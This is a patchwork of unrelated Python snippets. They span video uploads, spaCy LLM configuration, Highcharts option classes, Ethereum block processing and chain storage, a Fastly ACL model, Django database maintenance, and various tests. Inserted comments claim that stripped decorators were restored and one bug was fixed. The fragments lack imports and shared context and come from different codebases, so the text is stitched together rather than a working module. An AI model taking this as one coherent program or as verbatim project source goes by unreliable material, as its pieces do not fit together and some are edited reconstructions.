    def __init__(self, video, wait_for_encoding=False, interval=3, timeout=180):
        self._video = video
        self._api = video.get_api_assured()
        if video.Field.filepath in video:
            self._file_path = video[video.Field.filepath]
            self._slideshow_spec = None
        elif video.Field.slideshow_spec in video:
            self._slideshow_spec = video[video.Field.slideshow_spec]
            self._file_path = None
        self._account_id = video.get_parent_id_assured()
        self._wait_for_encoding = wait_for_encoding
        self._start_request_manager = VideoUploadStartRequestManager(self._api)
        self._transfer_request_manager = VideoUploadTransferRequestManager(self._api)
        self._finish_request_manager = VideoUploadFinishRequestManager(self._api)
        self._timeout = timeout
        self._interval = interval

    def start(self):
        start_response = self._start_request_manager.send_request(self.getStartRequestContext()).json()
        self._start_offset = int(start_response['start_offset'])
        self._end_offset = int(start_response['end_offset'])
        self._session_id = start_response['upload_session_id']
        video_id = start_response['video_id']
        self._transfer_request_manager.send_request(self.getTransferRequestContext())
        response = self._finish_request_manager.send_request(self.getFinishRequestContext())
        if self._wait_for_encoding:
            VideoEncodingStatusChecker.waitUntilReady(self._api, video_id,
                                                      interval=self._interval, timeout=self._timeout)
        body = response.json().copy()
        body['id'] = video_id
        del body['success']
        return body

    def getStartRequestContext(self):
        context = VideoUploadRequestContext()
        if self._file_path:
            context.file_size = os.path.getsize(self._file_path)
        context.account_id = self._account_id
        return context

    def getTransferRequestContext(self):
        context = VideoUploadRequestContext()
        context.session_id = self._session_id
        context.start_offset = self._start_offset
        context.end_offset = self._end_offset
        if self._file_path:
            context.file_path = self._file_path
        if self._slideshow_spec:
            context.slideshow_spec = self._slideshow_spec
        context.account_id = self._account_id
        return context

    def getFinishRequestContext(self):
        context = VideoUploadRequestContext()
        context.session_id = self._session_id
        context.account_id = self._account_id
        if self._file_path:
            context.file_name = ntpath.basename(self._file_path)
        return context
# Assumed to be a pytest fixture; the decorator and the `@...` registry keys in
# the config string appear to have been stripped in extraction. They are
# restored here as `@llm_tasks`, `@misc`, and `@llm_models`, spacy-llm's
# registry key names for tasks, readers/normalizers, and models.
@pytest.fixture
def ext_template_cfg_string():
    return f"""
[nlp]
lang = "en"
pipeline = ["llm"]
batch_size = 128

[components]

[components.llm]
factory = "llm"

[components.llm.task]
@llm_tasks = "spacy.NER.v3"
description = "This is a description"
labels = ["PER", "ORG", "LOC"]

[components.llm.task.examples]
@misc = "spacy.FewShotReader.v1"
path = {str(Path(__file__).parent / 'examples' / 'ner.json')}

[components.llm.task.template]
@misc = "spacy.FileReader.v1"
path = {str(Path(__file__).parent / 'templates' / 'ner.jinja2')}

[components.llm.task.normalizer]
@misc = "spacy.LowercaseNormalizer.v1"

[components.llm.model]
@llm_models = "spacy.GPT-3-5.v2"
"""
class OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsMappingLowpassResonance(Options):
    # @property / @<name>.setter pairs restored, as above.

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
def state_transition(chain: BlockChain, block: Block) -> None:
    parent_header = chain.blocks[-1].header
    validate_header(block.header, parent_header)
    ensure(block.ommers == (), InvalidBlock)
    (gas_used, transactions_root, receipt_root, block_logs_bloom, state) = apply_body(
        chain.state, get_last_256_block_hashes(chain), block.header.coinbase,
        block.header.number, block.header.base_fee_per_gas, block.header.gas_limit,
        block.header.timestamp, block.header.prev_randao, block.transactions,
        chain.chain_id)
    ensure(gas_used == block.header.gas_used, InvalidBlock)
    ensure(transactions_root == block.header.transactions_root, InvalidBlock)
    ensure(state_root(state) == block.header.state_root, InvalidBlock)
    ensure(receipt_root == block.header.receipt_root, InvalidBlock)
    ensure(block_logs_bloom == block.header.bloom, InvalidBlock)
    chain.blocks.append(block)
    if len(chain.blocks) > 255:
        chain.blocks = chain.blocks[-255:]
class Generator(lg.Node):
    BARPLOT_OUTPUT = lg.Topic(BarPlotMessage)
    LINEPLOT_OUTPUT = lg.Topic(LinePlotMessage)
    config: GeneratorConfig

    # `@lg.publisher(...)` decorators restored; extraction left only the bare
    # topic names in parentheses.
    @lg.publisher(BARPLOT_OUTPUT)
    async def generate_noise(self) -> lg.AsyncPublisher:
        while True:
            yield (self.BARPLOT_OUTPUT,
                   BarPlotMessage(domain=np.arange(self.config.num_features + 1),
                                  range=np.random.rand(self.config.num_features)))
            await asyncio.sleep(1 / self.config.sample_rate)

    @lg.publisher(LINEPLOT_OUTPUT)
    async def generate__noise(self) -> lg.AsyncPublisher:
        while True:
            yield (self.LINEPLOT_OUTPUT,
                   LinePlotMessage(timestamp=time.time(), data=random() * 100))
            await asyncio.sleep(1 / self.config.sample_rate)
def match(d, pattern, separator='.', indexes=True):
    if type_util.is_regex(pattern):
        regex = pattern
    elif type_util.is_string(pattern):
        pattern = re.sub('([\\*]{1})', '(.)*', pattern)
        pattern = re.sub('(\\[([^\\[\\]]*)\\])', '\\[\\g<2>\\]', pattern)
        regex = re.compile(pattern, flags=re.DOTALL)
    else:
        raise ValueError(f'Expected regex or string, found: {type(pattern)}')
    kps = keypaths(d, separator=separator, indexes=indexes)
    values = [d.get(kp) for kp in kps if regex.match(kp)]
    return values
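# A hedged sketch of the wildcard matching above. It assumes a mapping whose
# get() accepts dotted keypaths (python-benedict's dict does; a plain dict
# does not), since match() looks values up via d.get(keypath).
from benedict import benedict

d = benedict({'users': [{'name': 'ada'}, {'name': 'alan'}]})
# '*' is rewritten to '(.)*' before compiling, so the pattern matches any
# keypath from 'users' down to a '.name' leaf, including list indexes.
print(match(d, 'users*name'))  # expected: ['ada', 'alan']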
class TestEnsurePassphrase(TestCase):
    def __init__(self, *args, **kwargs):
        super(TestEnsurePassphrase, self).__init__(*args, **kwargs)
        self.path = None
        from copr_keygen import app as mock_app
        self.mock_app = mock_app

    # Made a property so that `self.target` below resolves to a path string
    # rather than a bound method; the tests use it without calling it.
    @property
    def target(self):
        return os.path.join(self.path, TEST_EMAIL)

    def setUp(self):
        self.path = tempfile.mkdtemp()
        self.mock_app.config['PHRASES_DIR'] = self.path

    def tearDown(self):
        shutil.rmtree(self.path)

    def test_file_creation(self):
        ensure_passphrase_exist(self.mock_app, TEST_EMAIL)
        assert os.path.exists(self.target)
        assert os.path.getsize(self.target) > 0

    def test_add_content_to_empty_file(self):
        open(self.target, 'w').close()
        assert os.path.getsize(self.target) == 0
        ensure_passphrase_exist(self.mock_app, TEST_EMAIL)
        assert os.path.getsize(self.target) > 0
class UntypableNode(BMGError):
    node: BMGNode
    node_locations: Set[FunctionCall]

    def __init__(self, node: BMGNode, node_locations: Set[FunctionCall]) -> None:
        self.node = node
        self.node_locations = node_locations

    def __str__(self) -> str:
        msg = 'INTERNAL COMPILER ERROR: Untypable node\n'
        msg += '(This indicates a defect in the compiler, not in the model.)\n'
        # Append rather than assign: the original `msg = f'...'` silently
        # discarded the two lines built above.
        msg += f'The model uses {a_or_an(get_node_error_label(self.node))} node.\n'
        msg += 'The compiler is unable to determine its type in the Bean Machine Graph'
        msg += ' type system.'
        if len(self.node_locations) > 0:
            msg += '\nThe untypable node was created in function call '
            msg += ', '.join(sorted(str(loc) for loc in self.node_locations))
            msg += '.'
        return msg
class BulkUpdateAclEntry(ModelComposed):
    allowed_values = {
        ('negated',): {'disable': 0, 'enable': 1},
        ('op',): {'CREATE': 'create', 'UPDATE': 'update', 'DELETE': 'delete'},
    }

    validations = {}

    # `@cached_property` / `@convert_js_args_to_python_args` decorators restored;
    # extraction reduced them to bare `_property` / `_js_args_to_python_args`
    # tokens (a `@classmethod` on `_from_openapi_data` is restored as well).
    @cached_property
    def additional_properties_type():
        lazy_import()
        return (bool, date, datetime, dict, float, int, list, str, none_type)

    _nullable = False

    @cached_property
    def openapi_types():
        lazy_import()
        return {'negated': (int,), 'comment': (str, none_type), 'ip': (str,),
                'subnet': (int, none_type), 'op': (str,), 'id': (str,)}

    @cached_property
    def discriminator():
        return None

    attribute_map = {'negated': 'negated', 'comment': 'comment', 'ip': 'ip',
                     'subnet': 'subnet', 'op': 'op', 'id': 'id'}

    read_only_vars = {'id'}

    @classmethod
    @convert_js_args_to_python_args
    def _from_openapi_data(cls, *args, **kwargs):
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        self = super(OpenApiModel, cls).__new__(cls)
        if args:
            raise ApiTypeError(
                'Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.'
                % (args, self.__class__.__name__),
                path_to_item=_path_to_item, valid_classes=(self.__class__,))
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item,
                         '_spec_property_naming': _spec_property_naming,
                         '_configuration': _configuration,
                         '_visited_composed_classes': self._visited_composed_classes}
        composed_info = validate_get_composed_info(constant_args, kwargs, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        discarded_args = composed_info[3]
        for (var_name, var_value) in kwargs.items():
            if (var_name in discarded_args
                    and self._configuration is not None
                    and self._configuration.discard_unknown_keys
                    and self._additional_properties_model_instances):
                continue
            setattr(self, var_name, var_value)
        return self

    required_properties = set([
        '_data_store', '_check_type', '_spec_property_naming', '_path_to_item',
        '_configuration', '_visited_composed_classes', '_composed_instances',
        '_var_name_to_model_instances', '_additional_properties_model_instances'])

    @convert_js_args_to_python_args
    def __init__(self, *args, **kwargs):
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        if args:
            raise ApiTypeError(
                'Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.'
                % (args, self.__class__.__name__),
                path_to_item=_path_to_item, valid_classes=(self.__class__,))
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item,
                         '_spec_property_naming': _spec_property_naming,
                         '_configuration': _configuration,
                         '_visited_composed_classes': self._visited_composed_classes}
        composed_info = validate_get_composed_info(constant_args, kwargs, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        discarded_args = composed_info[3]
        for (var_name, var_value) in kwargs.items():
            if (var_name in discarded_args
                    and self._configuration is not None
                    and self._configuration.discard_unknown_keys
                    and self._additional_properties_model_instances):
                continue
            setattr(self, var_name, var_value)
            if var_name in self.read_only_vars:
                raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.')

    @cached_property
    def _composed_schemas():
        lazy_import()
        return {'anyOf': [], 'allOf': [AclEntry, BulkUpdateAclEntryAllOf], 'oneOf': []}
def get_tuple_validator(subvalidator):
    def validator(value):
        if isinstance(value, (tuple, list)):
            value2 = tuple(value)
        elif isinstance(value, basestring):  # Python 2 string type, per the original
            # Parse a string like '(a, b, c)' or '[a, b, c]' into its elements.
            value2 = tuple(s.strip() for s in value.strip('()[]').split(','))
        else:
            raise ValueError('Cannot make a tuple of %r' % value)
        return tuple(subvalidator(x) for x in value2)
    return validator
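# A quick usage sketch for the factory above. Note that `basestring` only
# exists on Python 2; on Python 3 the string branch would need `str` instead.
to_int_tuple = get_tuple_validator(int)
print(to_int_tuple([1, '2', 3]))   # (1, 2, 3)
print(to_int_tuple('(4, 5, 6)'))   # (4, 5, 6): brackets stripped, then split on ','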
class ChainDB(HeaderDB, ChainDatabaseAPI):
    # The `@classmethod` / `@staticmethod` decorators below are restored: each
    # of these methods takes `cls` or a bare `db` as its first argument, and
    # the decorators appear to have been stripped in extraction. The mangled
    # `_tuple` and `_cache(maxsize=32)` tokens are read as eth-utils'
    # `@to_tuple` and `@lru_cache(maxsize=32)` respectively; both readings are
    # assumptions based on the py-evm codebase this class comes from.

    def __init__(self, db: AtomicDatabaseAPI) -> None:
        self.db = db

    def get_chain_gaps(self) -> ChainGaps:
        return self._get_chain_gaps(self.db)

    @classmethod
    def _get_chain_gaps(cls, db: DatabaseAPI) -> ChainGaps:
        try:
            encoded_gaps = db[SchemaV1.make_chain_gaps_lookup_key()]
        except KeyError:
            return GENESIS_CHAIN_GAPS
        else:
            return rlp.decode(encoded_gaps, sedes=chain_gaps)

    @classmethod
    def _update_chain_gaps(cls, db: DatabaseAPI, persisted_block: BlockAPI,
                           base_gaps: ChainGaps = None) -> GapInfo:
        if base_gaps is None:
            base_gaps = cls._get_chain_gaps(db)
        (gap_change, gaps) = fill_gap(persisted_block.number, base_gaps)
        if gap_change is not GapChange.NoChange:
            db.set(SchemaV1.make_chain_gaps_lookup_key(), rlp.encode(gaps, sedes=chain_gaps))
        return (gap_change, gaps)

    @classmethod
    def _update_header_chain_gaps(cls, db: DatabaseAPI, persisting_header: BlockHeaderAPI,
                                  base_gaps: ChainGaps = None) -> GapInfo:
        (gap_change, gaps) = super()._update_header_chain_gaps(db, persisting_header, base_gaps)
        if (gap_change is not GapChange.NoChange) or (persisting_header.block_number == 0):
            return (gap_change, gaps)
        current_gaps = cls._get_chain_gaps(db)
        if not is_block_number_in_gap(persisting_header.block_number, current_gaps):
            old_canonical_header = cls._get_canonical_block_header_by_number(
                db, persisting_header.block_number)
            if old_canonical_header != persisting_header:
                updated_gaps = reopen_gap(persisting_header.block_number, current_gaps)
                db.set(SchemaV1.make_chain_gaps_lookup_key(),
                       rlp.encode(updated_gaps, sedes=chain_gaps))
        return (gap_change, gaps)

    def get_block_uncles(self, uncles_hash: Hash32) -> Tuple[BlockHeaderAPI, ...]:
        validate_word(uncles_hash, title='Uncles Hash')
        if uncles_hash == EMPTY_UNCLE_HASH:
            return ()
        try:
            encoded_uncles = self.db[uncles_hash]
        except KeyError as exc:
            raise HeaderNotFound(f'No uncles found for hash {uncles_hash!r}') from exc
        else:
            return tuple(rlp.decode(encoded_uncles, sedes=rlp.sedes.CountableList(HeaderSedes)))

    @classmethod
    def _decanonicalize_old_headers(
            cls, db: DatabaseAPI,
            numbers_to_decanonicalize: Sequence[BlockNumber]) -> Tuple[BlockHeaderAPI, ...]:
        old_canonical_headers = []
        for block_number in numbers_to_decanonicalize:
            try:
                old_hash = cls._get_canonical_block_hash(db, block_number)
            except HeaderNotFound:
                break
            else:
                old_header = cls._get_block_header_by_hash(db, old_hash)
                old_canonical_headers.append(old_header)
                try:
                    transaction_hashes = cls._get_block_transaction_hashes(db, old_header)
                    for transaction_hash in transaction_hashes:
                        cls._remove_transaction_from_canonical_chain(db, transaction_hash)
                except MissingTrieNode:
                    pass
        return tuple(old_canonical_headers)

    def persist_block(self, block: BlockAPI,
                      genesis_parent_hash: Hash32 = GENESIS_PARENT_HASH
                      ) -> Tuple[Tuple[Hash32, ...], Tuple[Hash32, ...]]:
        with self.db.atomic_batch() as db:
            return self._persist_block(db, block, genesis_parent_hash)

    def persist_unexecuted_block(self, block: BlockAPI, receipts: Tuple[ReceiptAPI, ...],
                                 genesis_parent_hash: Hash32 = GENESIS_PARENT_HASH
                                 ) -> Tuple[Tuple[Hash32, ...], Tuple[Hash32, ...]]:
        (tx_root_hash, tx_kv_nodes) = make_trie_root_and_nodes(block.transactions)
        if tx_root_hash != block.header.transaction_root:
            raise ValidationError(
                f"Block's transaction_root ({block.header.transaction_root!r}) "
                f"does not match expected value: {tx_root_hash!r}")
        (receipt_root_hash, receipt_kv_nodes) = make_trie_root_and_nodes(receipts)
        if receipt_root_hash != block.header.receipt_root:
            raise ValidationError(
                f"Block's receipt_root ({block.header.receipt_root!r}) "
                f"does not match expected value: {receipt_root_hash!r}")
        with self.db.atomic_batch() as db:
            self._persist_trie_data_dict(db, receipt_kv_nodes)
            self._persist_trie_data_dict(db, tx_kv_nodes)
            return self._persist_block(db, block, genesis_parent_hash)

    @classmethod
    def _persist_block(cls, db: DatabaseAPI, block: BlockAPI,
                       genesis_parent_hash: Hash32
                       ) -> Tuple[Tuple[Hash32, ...], Tuple[Hash32, ...]]:
        header_chain = (block.header,)
        (new_canonical_headers, old_canonical_headers) = cls._persist_header_chain(
            db, header_chain, genesis_parent_hash)
        for header in new_canonical_headers:
            if header.hash == block.hash:
                tx_hashes = tuple(tx.hash for tx in block.transactions)
            else:
                tx_hashes = cls._get_block_transaction_hashes(db, header)
            for (index, transaction_hash) in enumerate(tx_hashes):
                cls._add_transaction_to_canonical_chain(db, transaction_hash, header, index)
            if hasattr(block, 'withdrawals') and block.withdrawals not in (None, ()):
                withdrawal_hashes = tuple(withdrawal.hash for withdrawal in block.withdrawals)
                for (index, withdrawal_hash) in enumerate(withdrawal_hashes):
                    cls._add_withdrawal_to_canonical_chain(db, withdrawal_hash, header, index)
        if block.uncles:
            uncles_hash = cls._persist_uncles(db, block.uncles)
        else:
            uncles_hash = EMPTY_UNCLE_HASH
        if uncles_hash != block.header.uncles_hash:
            raise ValidationError(
                "Block's uncles_hash (%s) does not match actual uncles' hash (%s)",
                block.header.uncles_hash, uncles_hash)
        new_canonical_hashes = tuple(header.hash for header in new_canonical_headers)
        old_canonical_hashes = tuple(header.hash for header in old_canonical_headers)
        cls._update_chain_gaps(db, block)
        return (new_canonical_hashes, old_canonical_hashes)

    def persist_uncles(self, uncles: Tuple[BlockHeaderAPI]) -> Hash32:
        return self._persist_uncles(self.db, uncles)

    @staticmethod
    def _persist_uncles(db: DatabaseAPI, uncles: Tuple[BlockHeaderAPI, ...]) -> Hash32:
        uncles_hash = keccak(rlp.encode(uncles))
        db.set(uncles_hash, rlp.encode(uncles, sedes=rlp.sedes.CountableList(HeaderSedes)))
        return cast(Hash32, uncles_hash)

    @staticmethod
    def _get_block_data_from_root_hash(db: DatabaseAPI,
                                       block_root_hash: Hash32) -> Iterable[Hash32]:
        item_db = HexaryTrie(db, root_hash=block_root_hash)
        for item_idx in itertools.count():
            item_key = rlp.encode(item_idx)
            encoded = item_db[item_key]
            if encoded != b'':
                yield encoded
            else:
                break

    def add_receipt(self, block_header: BlockHeaderAPI, index_key: int,
                    receipt: ReceiptAPI) -> Hash32:
        receipt_db = HexaryTrie(db=self.db, root_hash=block_header.receipt_root)
        receipt_db[index_key] = receipt.encode()
        return receipt_db.root_hash

    def add_transaction(self, block_header: BlockHeaderAPI, index_key: int,
                        transaction: SignedTransactionAPI) -> Hash32:
        transaction_db = HexaryTrie(self.db, root_hash=block_header.transaction_root)
        transaction_db[index_key] = transaction.encode()
        return transaction_db.root_hash

    def get_block_transactions(self, header: BlockHeaderAPI,
                               transaction_decoder: Type[TransactionDecoderAPI]
                               ) -> Tuple[SignedTransactionAPI, ...]:
        return self._get_block_transactions(header.transaction_root, transaction_decoder)

    def get_block_transaction_hashes(self, block_header: BlockHeaderAPI) -> Tuple[Hash32, ...]:
        return self._get_block_transaction_hashes(self.db, block_header)

    @classmethod
    @to_tuple
    def _get_block_transaction_hashes(cls, db: DatabaseAPI,
                                      block_header: BlockHeaderAPI) -> Iterable[Hash32]:
        all_encoded_transactions = cls._get_block_data_from_root_hash(
            db, block_header.transaction_root)
        for encoded_transaction in all_encoded_transactions:
            yield cast(Hash32, keccak(encoded_transaction))

    @to_tuple
    def get_receipts(self, header: BlockHeaderAPI,
                     receipt_decoder: Type[ReceiptDecoderAPI]) -> Iterable[ReceiptAPI]:
        receipt_db = HexaryTrie(db=self.db, root_hash=header.receipt_root)
        for receipt_idx in itertools.count():
            receipt_key = rlp.encode(receipt_idx)
            receipt_data = receipt_db[receipt_key]
            if receipt_data != b'':
                yield receipt_decoder.decode(receipt_data)
            else:
                break

    def get_transaction_by_index(self, block_number: BlockNumber, transaction_index: int,
                                 transaction_decoder: Type[TransactionDecoderAPI]
                                 ) -> SignedTransactionAPI:
        try:
            block_header = self.get_canonical_block_header_by_number(block_number)
        except HeaderNotFound:
            raise TransactionNotFound(f'Block {block_number} is not in the canonical chain')
        transaction_db = HexaryTrie(self.db, root_hash=block_header.transaction_root)
        encoded_index = rlp.encode(transaction_index)
        encoded_transaction = transaction_db[encoded_index]
        if encoded_transaction != b'':
            return transaction_decoder.decode(encoded_transaction)
        else:
            raise TransactionNotFound(
                f'No transaction is at index {transaction_index} of block {block_number}')

    def get_transaction_index(self, transaction_hash: Hash32) -> Tuple[BlockNumber, int]:
        key = SchemaV1.make_transaction_hash_to_block_lookup_key(transaction_hash)
        try:
            encoded_key = self.db[key]
        except KeyError:
            raise TransactionNotFound(
                f'Transaction {encode_hex(transaction_hash)} not found in canonical chain')
        transaction_key = rlp.decode(encoded_key, sedes=BlockDataKey)
        return (transaction_key.block_number, transaction_key.index)

    def get_receipt_by_index(self, block_number: BlockNumber, receipt_index: int,
                             receipt_decoder: Type[ReceiptDecoderAPI]) -> ReceiptAPI:
        try:
            block_header = self.get_canonical_block_header_by_number(block_number)
        except HeaderNotFound:
            raise ReceiptNotFound(f'Block {block_number} is not in the canonical chain')
        receipt_db = HexaryTrie(db=self.db, root_hash=block_header.receipt_root)
        receipt_key = rlp.encode(receipt_index)
        receipt_data = receipt_db[receipt_key]
        if receipt_data != b'':
            return receipt_decoder.decode(receipt_data)
        else:
            raise ReceiptNotFound(f'Receipt with index {receipt_index} not found in block')

    @lru_cache(maxsize=32)
    @to_tuple
    def _get_block_transactions(self, transaction_root: Hash32,
                                transaction_decoder: Type[TransactionDecoderAPI]
                                ) -> Iterable[SignedTransactionAPI]:
        for encoded_transaction in self._get_block_data_from_root_hash(self.db, transaction_root):
            yield transaction_decoder.decode(encoded_transaction)

    @staticmethod
    def _remove_transaction_from_canonical_chain(db: DatabaseAPI,
                                                 transaction_hash: Hash32) -> None:
        db.delete(SchemaV1.make_transaction_hash_to_block_lookup_key(transaction_hash))

    @staticmethod
    def _add_transaction_to_canonical_chain(db: DatabaseAPI, transaction_hash: Hash32,
                                            block_header: BlockHeaderAPI, index: int) -> None:
        transaction_key = BlockDataKey(block_header.block_number, index)
        db.set(SchemaV1.make_transaction_hash_to_block_lookup_key(transaction_hash),
               rlp.encode(transaction_key))

    def get_block_withdrawals(self, header: BlockHeaderAPI) -> Tuple[WithdrawalAPI, ...]:
        return self._get_block_withdrawals(header.withdrawals_root)

    @lru_cache(maxsize=32)
    @to_tuple
    def _get_block_withdrawals(self, withdrawals_root: Hash32) -> Iterable[WithdrawalAPI]:
        for encoded_withdrawal in self._get_block_data_from_root_hash(self.db, withdrawals_root):
            yield rlp.decode(encoded_withdrawal, sedes=Withdrawal)

    @staticmethod
    def _add_withdrawal_to_canonical_chain(db: DatabaseAPI, withdrawal_hash: Hash32,
                                           block_header: BlockHeaderAPI, index: int) -> None:
        withdrawal_key = BlockDataKey(block_header.block_number, index)
        db.set(SchemaV1.make_withdrawal_hash_to_block_lookup_key(withdrawal_hash),
               rlp.encode(withdrawal_key))

    def exists(self, key: bytes) -> bool:
        return self.db.exists(key)

    def get(self, key: bytes) -> bytes:
        return self.db[key]

    def persist_trie_data_dict(self, trie_data_dict: Dict[Hash32, bytes]) -> None:
        with self.db.atomic_batch() as db:
            self._persist_trie_data_dict(db, trie_data_dict)

    @classmethod
    def _persist_trie_data_dict(cls, db: DatabaseAPI,
                                trie_data_dict: Dict[Hash32, bytes]) -> None:
        for (key, value) in trie_data_dict.items():
            db[key] = value
# `@pytest.mark` prefix restored; extraction left only `.usefixtures(...)`.
@pytest.mark.usefixtures('use_tmpdir')
def test_forward_model_env_and_exec_env_is_set():
    with open('exec', 'w', encoding='utf-8'):
        pass
    os.chmod('exec', stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    with open('CONFIG', 'w', encoding='utf-8') as f:
        f.write(dedent("""
            EXECUTABLE exec
            ENV a b
            ENV c d
            EXEC_ENV a1 b1
            EXEC_ENV c1 d1
        """))
    forward_model = ForwardModel.from_config_file('CONFIG')
    assert forward_model.environment['a'] == 'b'
    assert forward_model.environment['c'] == 'd'
    assert forward_model.exec_env['a1'] == 'b1'
    assert forward_model.exec_env['c1'] == 'd1'
def compile_valcode_to_evm_bytecode(valcode_type, address):
    valcodes = generate_all_valcodes(address)
    valcode = valcodes[valcode_type]
    if type(valcode) is bytes:
        return valcode
    elif type(valcode) is list:
        lll_node = LLLnode.from_list(valcode)
        optimized = optimizer.optimize(lll_node)
        assembly = compile_lll.compile_to_assembly(optimized)
        evm = compile_lll.assembly_to_evm(assembly)
        return evm
    else:
        raise ValueError('Valcode must be of types list (uncompiled LLL), or bytes '
                         '(compiled bytecode). Given: {}'.format(type(valcode)))
def unsubscribe_all(date, cognito_id):
    print('unsubscribing user from all lists...')
    user = user_service.get_single_user(cognito_id)
    if user.subscriptions:
        for subscription in user.subscriptions:
            unsubscribe_single_list(date, cognito_id, asdict(subscription))
    return
class OptionSeriesErrorbarSonificationDefaultinstrumentoptionsMappingHighpass(Options):
    # Assumed to be read-only sub-option properties, matching the sibling
    # generated classes above; the `@property` decorators were likely stripped.
    @property
    def frequency(self) -> 'OptionSeriesErrorbarSonificationDefaultinstrumentoptionsMappingHighpassFrequency':
        return self._config_sub_data('frequency', OptionSeriesErrorbarSonificationDefaultinstrumentoptionsMappingHighpassFrequency)

    @property
    def resonance(self) -> 'OptionSeriesErrorbarSonificationDefaultinstrumentoptionsMappingHighpassResonance':
        return self._config_sub_data('resonance', OptionSeriesErrorbarSonificationDefaultinstrumentoptionsMappingHighpassResonance)
class Command(BaseCommand):
    def add_arguments(self, parser):
        parser.add_argument('--db_name')
        parser.add_argument('--db_user')
        parser.add_argument('--db_pass')

    def handle(self, *args, **options):
        self.IS_VERBOSE = False
        if options['verbosity'] > 1:
            self.IS_VERBOSE = True
        if options['db_name']:
            db_name = options['db_name']
        else:
            db_name = utils.get_env_setting('DB_NAME')
        if options['db_user']:
            db_user = options['db_user']
        else:
            db_user = utils.get_env_setting('DB_USER')
        if options['db_pass']:
            db_pass = options['db_pass']
        else:
            db_pass = utils.get_env_setting('DB_PASS')
        db_host = utils.get_env_setting('DB_HOST')
        self.conn = psycopg2.connect(database=db_name, user=db_user,
                                     password=db_pass, host=db_host)
        cursor = self.conn.cursor()
        self.create_foreign_keys(cursor)
        self.analyze_db(cursor)
        self.conn.commit()
        self.conn.close()

    def create_foreign_keys(self, cursor):
        if self.IS_VERBOSE:
            print('Adding foreign key references...')
        prefix = 'ALTER TABLE frontend_prescription '
        prefix += 'ADD CONSTRAINT frontend_prescription'
        suffix = ' ON DELETE CASCADE'
        indexes = [{'fk': 'sha_id', 'table': 'frontend_sha', 'pk': 'code'},
                   {'fk': 'pct_id', 'table': 'frontend_pct', 'pk': 'code'},
                   {'fk': 'chemical_id', 'table': 'frontend_chemical', 'pk': 'bnf_code'},
                   {'fk': 'practice_id', 'table': 'frontend_practice', 'pk': 'code'}]
        for index in indexes:
            cmd = '%s_%s_fkey ' % (prefix, index['fk'])
            cmd += 'FOREIGN KEY (%s) ' % index['fk']
            cmd += 'REFERENCES %s(%s) ' % (index['table'], index['pk'])
            cmd += suffix
            self._print_and_execute(cursor, cmd)

    def analyze_db(self, cursor):
        if self.IS_VERBOSE:
            print('Analyzing database...')
        self._print_and_execute(cursor, 'ANALYZE VERBOSE')

    def _print_and_execute(self, cursor, cmd):
        if self.IS_VERBOSE:
            print(cmd)
        cursor.execute(cmd)
        self.conn.commit()
class TestPathlibMatch(TestPathlibGlobmatch):
    cases = [
        ['match', 'some/path/to/match', True],
        ['to/match', 'some/path/to/match', True],
        ['path/to/match', 'some/path/to/match', True],
        ['some/**/match', 'some/path/to/match', False],
        ['some/**/match', 'some/path/to/match', True, pathlib.G],
    ]

    @classmethod  # decorator restored; the method takes `cls`
    def run(cls, path, pattern, flags, goal):
        assert path.match(pattern, flags=flags) == goal, \
            'Expression did not evaluate as %s' % goal
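# For context, a hedged example of what these cases exercise, via wcmatch's
# pathlib wrapper (G aliases GLOBSTAR, which lets '**' span path separators):
from wcmatch import pathlib

p = pathlib.PurePath('some/path/to/match')
print(p.match('some/**/match'))                          # False without GLOBSTAR
print(p.match('some/**/match', flags=pathlib.GLOBSTAR))  # True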
class _MonitorThread(threading.Thread):
    def __init__(self, runner: LocalRunner) -> None:
        super().__init__()
        self.runner = runner

    def run(self) -> None:
        if self.runner._options.bootstrap_info is None:
            return
        while True:
            if not self.runner._running:
                logger.debug(f'{self.runner._module}:monitor thread stopping')
                return
            try:
                if (self.runner._options.bootstrap_info.process_manager_state.get_overall().value
                        >= ProcessPhase.STOPPING.value):
                    logger.debug(f'{self.runner._module}:stopping due to graph shutdown')
                    self.runner._running = False
                    return
            except (EOFError, ConnectionError, OSError, BrokenPipeError):
                logger.warning(f'{self.runner._module}:lost process manager, stopping')
                self.runner._running = False
            time.sleep(0.1)
